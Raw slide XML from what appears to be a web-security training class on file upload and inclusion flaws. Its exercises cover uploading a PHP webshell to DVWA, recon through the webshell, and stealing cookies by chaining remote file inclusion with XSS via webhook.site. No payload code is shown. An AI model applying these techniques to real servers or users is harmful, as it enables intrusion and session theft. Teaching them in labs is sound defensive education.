                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>For this exercise, you'll perform some recon on the server you compromised in the previous class.</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Use Firefox to navigate to: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  - &lt;http://ptl-08a17b2b-81673f5e.libcurl.so/?page=intro.php&gt;</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Enable Foxy Proxy, launch Burp Suite, and intercept a request to the vulnerable page.</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Then, follow the instructions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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Good luck!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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a:xfrm>
            <a:off x="4094480" y="80936"/>
            <a:ext cx="4829329" cy="411480"/>
          </a:xfrm>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My First RFI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59337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err="1">
                <a:solidFill>
                  <a:srgbClr val="FDB072"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FDB072"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Recon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7618101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6869289" cy="704060"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Webhook</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1941176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sz="2500" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>For this exercise, you’ll familiarize yourself with Webhook, which you’ll use to intercept requests from victims vulnerable to RFI and XSS.</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Use Firefox to navigate to: &lt;https://webhook.site&gt;.</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Enable Foxy Proxy, and intercept a request to your unique Webhook URL. Be sure to disable the interceptor after you capture the request.</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Then, follow the instructions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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Good luck!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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a:xfrm>
            <a:off x="4094480" y="80936"/>
            <a:ext cx="4829329" cy="411480"/>
          </a:xfrm>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First Steps with Webhook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4194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Webhook</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48680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sz="2500" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>For this exercise, you’ll build a PHP payload to deliver an XSS attack via RFI,</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At the end of it, you’ll be able to steal cookies from a victim who clicks on the vulnerable link you build. You’ll use this payload for “real” cookie-stealing attacks later.</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Follow the instructions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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Good luck!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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a:xfrm>
            <a:off x="4094480" y="80936"/>
            <a:ext cx="4829329" cy="411480"/>
          </a:xfrm>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Cookie Phishing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884104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D1E-06B0-2D4E-9990-8CB184A085C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Today’s Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7518445-EE58-3D45-8506-776FB55A0314}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321972" y="1094704"/>
            <a:ext cx="4859022" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for LFI/RFI vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exfiltrate data from a server with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webshells</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steal cookies by combining RFI with XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1802330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Cookie Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3513921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086601" cy="704060"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FIN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="688146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391401" cy="704060"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL Injection Warm-Up</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2009508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sz="2500" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In this exercise, you’ll review essential concepts around SQL injection.</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sz="2500" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Answer the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Questions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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provided via Slack.</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SQL Injection Warm-Up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444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a:solidFill>
                  <a:srgbClr val="FDB072"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FDB072"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Warm-Up</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2818690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391401" cy="704060"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>File Uploads and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Webshells</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92084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err="1">
                <a:solidFill>
                  <a:srgbClr val="F8B041"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Webshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8B041"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Demonstration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1197237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sz="2500" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In this exercise, you’ll:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Study a minimal PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>webshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Upload a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to a vulnerable server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use Burp Suite to perform reconnaissance against a vulnerable host.</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Start DVWA with the Docker command below:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker run --rm –p 80:80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vulnerables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/web-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </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Then, follow the directions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provided via Slack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Good luck!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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My First </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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00238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My First </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FDB072"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Webshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FDB072"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3154648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4421</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>445</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Courier New</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Trilogy_Class_Template</vt:lpstr>
      <vt:lpstr>File Upload &amp; Inclusion</vt:lpstr>
      <vt:lpstr>Today’s Goals</vt:lpstr>
      <vt:lpstr>SQL Injection Warm-Up</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>File Uploads and Webshells</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>BREAK</vt:lpstr>
      <vt:lpstr>Remote File Inclusion</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Webhook</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</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creator>ahaque89</dc:creator>
  <cp:lastModifiedBy>Peleke Sengstacke</cp:lastModifiedBy>
  <cp:revision>4377</cp:revision>
  <cp:lastPrinted>2016-01-30T16:23:56Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-01-20T17:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-01-05T01:32:05Z</dcterms:modified>
</cp:coreProperties>
</file>